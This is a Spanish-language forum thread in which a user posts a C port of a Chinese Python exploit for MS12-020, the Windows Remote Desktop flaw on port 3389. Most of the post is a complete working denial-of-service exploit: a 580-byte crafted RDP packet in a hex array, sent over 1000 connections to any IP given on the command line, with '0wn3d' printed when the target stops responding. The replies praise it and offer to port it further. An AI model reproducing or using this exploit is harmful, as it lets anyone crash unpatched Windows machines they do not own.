Crash Windows (MS12_020) implementacion en C

Mensajes: 1484 Registrado: 02 Sep 2010, 21:39

por osnaraus Usa camisa de fuerza

Bueno, solamente hice una traduccion a C ...y alguna que otra modificacion de un exploit chino que explota una de las ultimas vulnerabilidades públicas conocidas de Windows, cuando éste tiene el puerto abierto 3389 (escritorio remoto), sin mas dejo el original en python y su traduccion a C

Mostrar/Ocultar

Código: Seleccionar todo

#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")

const char hexosni[580]={0x03,0x00,0x00,0x13,0x0e,0xe0,0x00,0x00,0x00,0x00,0x00,0x01,
0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x01,0xd6,0x02,0xf0,0x80,0x7f,0x65,0x82,
0x01,0x94,0x04,0x01,0x01,0x04,0x01,0x01,0x01,0x01,0xff,0x30,0x19,0x02,0x04,0x00,0x00,
0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x02,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x30,0x19,0x02,0x04,0x00,0x00,0x00,0x01,0x02,
0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x01,
0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x02,0x04,0x20,0x02,
0x04,0x00,0x00,0x00,0x02,0x30,0x1c,0x02,0x02,0xff,0xff,0x02,0x02,0xfc,0x17,0x02,0x02,
0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x01,0x02,0x04,0x00,0x00,0x00,0x00,0x02,0x04,0x00,
0x00,0x00,0x01,0x02,0x02,0xff,0xff,0x02,0x04,0x00,0x00,0x00,0x02,0x04,0x82,0x01,0x33,
0x00,0x05,0x00,0x14,0x7c,0x00,0x01,0x81,0x2a,0x00,0x08,0x00,0x10,0x00,0x01,0xc0,0x00,
0x44,0x75,0x63,0x61,0x81,0x1c,0x01,0xc0,0xd8,0x00,0x04,0x00,0x08,0x00,0x80,0x02,0xe0,
0x01,0x01,0xca,0x03,0xaa,0x09,0x04,0x00,0x00,0xce,0x0e,0x00,0x00,0x48,0x00,0x4f,0x00,
0x53,0x00,0x54,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x0c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x01,0xca,0x01,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x07,0x00,0x01,0x00,0x30,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,
0x2d,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x2d,
0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x04,0xc0,0x0c,0x00,0x0d,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0xc0,0x0c,0x00,
0x1b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0xc0,0x2c,0x00,0x03,0x00,0x00,0x00,0x72,
0x64,0x70,0x64,0x72,0x00,0x00,0x00,0x00,0x00,0x80,0x80,0x63,0x6c,0x69,0x70,0x72,0x64,
0x72,0x00,0x00,0x00,0xa0,0xc0,0x72,0x64,0x70,0x73,0x6e,0x64,0x00,0x00,0x00,0x00,0x00,
0xc0,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x04,0x01,0x00,0x01,0x00,0x03,0x00,0x00,0x08,
0x02,0xf0,0x80,0x28,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xef,0x03,
0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xeb,0x03,0x00,0x00,0x0c,0x02,0xf0,
0x80,0x38,0x00,0x06,0x03,0xec,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,
0xed,0x03,0x00,0x00,0x0c,0x02,0xf0,0x80,0x38,0x00,0x06,0x03,0xee,0x03,0x00,0x00,0x0b,
0x06,0xd0,0x00,0x00,0x12,0x34,0x00 };

int main(int argc, char* argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    struct sockaddr_in toTest;
    int result;
	
	
    WSAStartup(MAKEWORD(2, 2), &wsaData);
	printf("Testeando %s...", argv[1]);
	for (int i=0;i<1000;i++)
	{
		printf (".");
    hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
	if (hSocket == 0) 
		return 0;

    toTest.sin_family = AF_INET;
    toTest.sin_port = htons(3389);
    toTest.sin_addr.s_addr = inet_addr(argv[1]);
    
    result = connect(hSocket, (SOCKADDR*)&toTest, sizeof(toTest));
		if (result != 0) 
		{ 
			if (i>1)
				printf("\n0wn3d");
			else
				printf("\nPuerto Cerrado");
		 
			return 0; 
		}

    result = send(hSocket, hexosni, sizeof(hexosni), 0);
    
	}

	printf("\nNo vulnerable");

    closesocket(hSocket);
    return 1;
	}

Salud

por p0is0n-123 Incurable

Increíble... tengo que probarlo en casa con alguna de mis "tostadoras"...
Felicidades por tomarte el tiempo de traducirlo a C/C++ y dejarlo para todos aquí...

¡Saludos!...

Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf

adwind · Mensajes: 1872 Registrado: 16 Mar 2011, 17:59

por adwind Usa camisa de fuerza

Bonito código lo pasaré a Java XD

MichBukana · Mensajes: 419 Registrado: 04 Nov 2010, 11:30

por MichBukana Esquizofrénico

buen aporte bro seguro te habra llevado tu tiempo

Salu2!

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

sanko

por sanko Se conecta desde un manicomio

que bueno brother

dofo · Mensajes: 20 Registrado: 11 Nov 2009, 00:04

por dofo Sin síntomas

muy bueno, gracias por compartirlo :D

Crash Windows (MS12_020) implementacion en C

Temas similares

Links sobre el tema

Variantes de tema

Crash Windows (MS12_020) implementacion en C

Mostrar mensajes previos

Ordenar por

Temas similares

Links sobre el tema

Variantes de tema